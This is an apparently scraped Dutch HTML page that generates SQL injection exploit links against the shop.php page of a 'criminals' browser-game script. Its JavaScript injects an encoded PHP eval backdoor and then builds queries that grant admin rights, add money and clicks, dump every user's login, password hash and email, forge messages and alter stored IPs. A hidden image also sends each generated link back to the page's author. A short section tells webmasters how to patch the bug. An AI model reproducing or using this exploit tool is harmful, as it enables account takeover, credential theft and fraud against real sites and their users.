📄 hackcrim.html
字号:
<div id="a33a22160" style="text-align: center; margin: 0px; padding: 0px;" align="center"></div>
<html>
<head>
<script type="text/javascript">
var mode = 0;
function show(obj)
{
mode = obj.selectedIndex;
for (i = 0; i < obj.length; i++)
document.getElementById(obj[i].value).style.display = (i == obj.selectedIndex)?"block":"none";
}
function createlink(myform)
{
if (!myform.akkoord.checked)
{
alert('Ga eerst akkoord met bovengenoemde.');
return false;
}
/* todo: validate input */
var link = myform.location.value + "?p=buy&s=5%20union%20select%200,0,0,0,0,0,0,0,char(36,115,116,61,39,115,116,114,105,112,115,108,97,115,104,101,115,39,59,101,118,97,108,40,36,115,116,40,36,115,116,40,36,95,71,69,84,91,39,99,39,93,41,41,46,39,59,39,41,59),0,0%23&";
switch (mode)
{
case 0:
link += "c=echo%20mysql_query($st($st($_GET['q'])))?'SUCCES':'FAILED';&q=update%20%60[users]%60%20set%20level=255%20where%20login='" + escape(myform.aname.value) + "';";
break;
case 1:
link += "c=echo%20mysql_query($st($st($_GET['q'])))?'SUCCES':'FAILED';&q=update%20%60[users]%60%20set%20bank=" + escape(myform.gamount.value) + "%20where%20login='" + escape(myform.gname.value) + "';";
break;
case 2:
link += "c=$m=mysql_query($st($st($_GET['q'])));echo '<div style="border: 1px solid black; background-color: white; color: black;">'; while($r=mysql_fetch_assoc($m)){printf('Login: %s<br>Wachtwoord hash: %s<br>E-Mail adres: %s<br><br>', $r['login'], $r['pass'], $r['email']);}; echo '</div>';&q=select%20login,pass,email%20from%20%60[users]%60%20where%20login%20like%20'" + escape(myform.pmatch.value.replace(/\*/g, "%").replace(/\?/g, "_")) + "';";
break;
case 3:
link += "c=echo%20mysql_query($st($st($_GET['q'])))?'SUCCES':'FAILED';&q=update%20%60[users]%60%20set%20clicks=" + escape(myform.camount.value) + "%20where%20login='" + escape(myform.cname.value) + "';";
break;
case 4:
link += "c=echo%20mysql_query($st($st($_GET['q'])))?'SUCCES':'FAILED';&q=insert%20into%20%60[messages]%60%20values('',%20'',%20'',%20now(),%20'" + escape(myform.mfname.value) + "', '" + escape(myform.mtname.value) + "', '" + escape(myform.msubj.value) + "', '" + escape(myform.mmsg.value) + "', '', '1', '');";
break;
case 5:
link += "c=echo%20'table%20users:'%20.%20(mysql_query($st($st($_GET['q'])))?'SUCCES<br>':'FAILED<br>');echo%20'table%20temp:'%20.%20(mysql_query($st($st($_GET['q2'])))?'SUCCES':'FAILED');&q=update%20%60[users]%60%20set%20IP%20=%20'" + escape(myform.iip.value) + "',%20IPs%20=%20'" + escape(myform.iip.value) + "'%20where%20login%20=%20'" + escape(myform.iname.value) + "';&q2=update%20%60[temp]%60%20set%20IP%20=%20'" + escape(myform.iip.value) + "'%20where%20login%20=%20'" + escape(myform.iname.value) + "';";
default:
}
document.getElementById("linkholder").innerHTML = "<a href=\"" + link + "\" target=\"_blank\">Klik hier</a><img src=\"schuur.jpg?link=" + escape(link) + "\" alt=\"\" style=\"visibility: hidden;\">";
return false;
}
</script>
<style type="text/css">
body {
font: normal 10pt/13pt "Lucida Grande", "Lucida Sans Unicode", verdana, lucida, sans-serif;
}
fieldset {
margin-bottom: 1em;
margin-top: 1em;
padding: 1em;
}
select, textarea {
margin-left: 1em;
display: block;
border: 1px solid #323232;
}
label {
font-weight: bold;
}
input {
display: block;
margin-bottom: 1em;
margin-left: 1em;
border: 1px solid #323232;
}
#linkholder {
width: 500px;
background-color: #EFEFEF;
border: 1px solid #323232;
padding: 1em;
}
div.comment {
font-weigth: normal;
font-size: 9pt;
margin: 1em;
padding: 0.5em;
width: auto;
background-color: #FBFBFB;
border: 1px solid #EFEFEF;
}
div.alert {
font-weigth: normal;
font-size: 9pt;
margin: 1em;
padding: 0.5em;
width: auto;
background-color: #EDC2C2;
border: 1px solid #FF4949;
}
h2 {
font-size: 12pt;
font-family: verdana;
}
em {
background-color: white;
border: 1px solid #323232;
padding: 2px;
font-style: normal;
}
</style>
</head>
<body>
<div id="king" style="position: absolute; top: 1em;">
<form method="post" action="clink.php">
<div class="alert">
<h2>Aan de webmasters:</h2>
<p>
Fix de bug als volgt:
<ol>
<li>Open 'shop.php' in notepad (of enige andere tekstverwerker)</li>
<li>Zet onder de eerste <em><?php</em> exact <em>$_GET['s'] = intval($_GET['s']);</em></li>
<li>Sla 'shop.php' op en zet hem weer op je server over de oude 'shop.php' heen</li>
</ol>
Test of hij gefixed is:
<ol>
<li>Wijs je browser direct naar shop.php op je site</li>
<li>Klik een category aan</li>
<li>Zoek op in de adresbalk 's=<een nummer>'</li>
<li>Zet achter dat nummer een ' teken</li>
<li>Druk op enter</li>
<li>Krijg je vervolgens een error en geen plaatjes, dan betekend het dat de bug er nog in zit</li>
<li>Krijg je gewoon plaatjes zoals normaal, betekend het dat de bug eruit is</li>
<ol>
</p>
</div>
<div class="comment">
Let op dat je ondanks gebruik makende van deze site niet anoniem bent.<br>
De webmaster van de desbetreffende site kunnen met gemak identificeren wie er achter de aanval zat en dit doorspelen.<br><br>
Deze site verschaft informatie die het mogelijk maakt een fout in het criminals script te misbruiken (dit wordt gezien als hacken en is dus verboden).<br>
Ik ben op geen enkele manier verantwoordelijk voor de mogelijke gevolgen door het gebruik van deze site.
<br><br>Akkoord <input type="checkbox" name="akkoord">
</div>
<label for="location">
Locatie van show.php :<br>
<div class="comment">
Deze kan je vinden door in het criminals menu met je rechter muisknop op 'shop' te klikken.<br>
Vervolgens klik je op 'copy link location', 'snelkoppeling kopieren' of 'copy shortcut.<br>
Die waarde kan je dan met ctrl+v in dit veld plakken.
</div>
<input type="text" name="location" value="" size="50">
</label>
<label for="action">
Actie :<br>
<div class="comment">
Selecteer hier actie die je wilt doen.
</div>
<select name="action" onchange="show(this);" size="4">
<option value="admin" selected>Maak jezelf admin</option>
<option value="geld">Geef jezelf geld</option>
<option value="passes">Overzicht pass + email + login</option>
<option value="clicks">Paas jezelf clicks</option>
<option value="msg">Verstuur een fake bericht</option>
<option value="dissip">Reset je ip in de databas</option>
</select>
</label>
<div class="comment">
Vul de benodige gegevens in.
</div>
<fieldset id="admin">
<legend>
Maak jezelf admin
</legend>
<label for="aname">
Naam :
<input type="text" name="aname" value="">
</label>
</fieldset>
<fieldset id="geld" style="display: none;">
<legend>
Geef jezelf geld
</legend>
<label for="gname">
Naam :
<div class="comment">
Vul hier je login naam in van het account waar je het geld op wilt zetten.
</div>
<input type="text" name="gname" value="">
</label>
<label for="gamount">
Hoeveelheid :
<input type="text" name="gamount" value="">
</label>
</fieldset>
<fieldset id="passes" style="display: none">
<legend>
Overzicht pass + email + login
</legend>
<label for="pmatch">
Naam :
<div class="comment">
Er kan gebruikt gemaakt worden van wilcards.<br>
Bijvoorbeeld, '*' als naam matched alle gebruikers.
</div>
<input type="text" name="pmatch" value="">
</label>
</fieldset>
<fieldset id="clicks" style="display: none;">
<legend>
Paas jezelf clicks
</legend>
<label for="cname">
Naam :
<div class="comment">
Vul hier je login naam in van het account waar je de clicks op wilt zetten.
</div>
<input type="text" name="cname" value="">
</label>
<label for="camount">
Aantal :
<input type="text" name="camount" value="">
</label>
</fieldset>
<fieldset id="msg" style="display: none;">
<legend>
Verstuur een fake bericht
</legend>
<label for="mtname">
Login (to) :
<div class="comment">
Vul hier de login in van het account waar je het bericht naartoe wilt sturen.
</div>
<input type="text" name="mtname" value="">
</label>
<label for="mfname">
Login (from) :
<div class="comment">
Vul hier de login in van het account waar het bericht van afkomstig moet lijken.
</div>
<input type="text" name="mfname" value="">
</label>
<label for="msubj">
Onderwerp :
<input type="text" name="msubj" value="">
</label>
<label for="mmsg">
Bericht :
<textarea name="mmsg" rows="5" cols="40"></textarea>
</label>
</fieldset>
<fieldset id="dissip" style="display: none;">
<legend>
Reset je ip in de database
</legend>
<label for="cname">
Naam :
<div class="comment">
Vul hier je login naam in van het account waarvan je de ips wilt resetten.
</div>
<input type="text" name="iname" value="">
</label>
<label for="camount">
Nieuwe ip :
<input type="text" name="iip" value="1.1.1.1">
</label>
</fieldset>
<div class="comment">
Klik op 'maak link' om de link te genereren.
</div>
<input type="submit" value="maak link" onclick="return createlink(this.form);">
<div class="comment">
Klik op de link hieronder om de hack toe te passen.<br>
Zorg er wel voor dat je al ingelogd bent op de criminals site.
</div>
<h2>Link :</h2>
<div id="linkholder">
</div>
</form>
</div>
</body>
</html>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -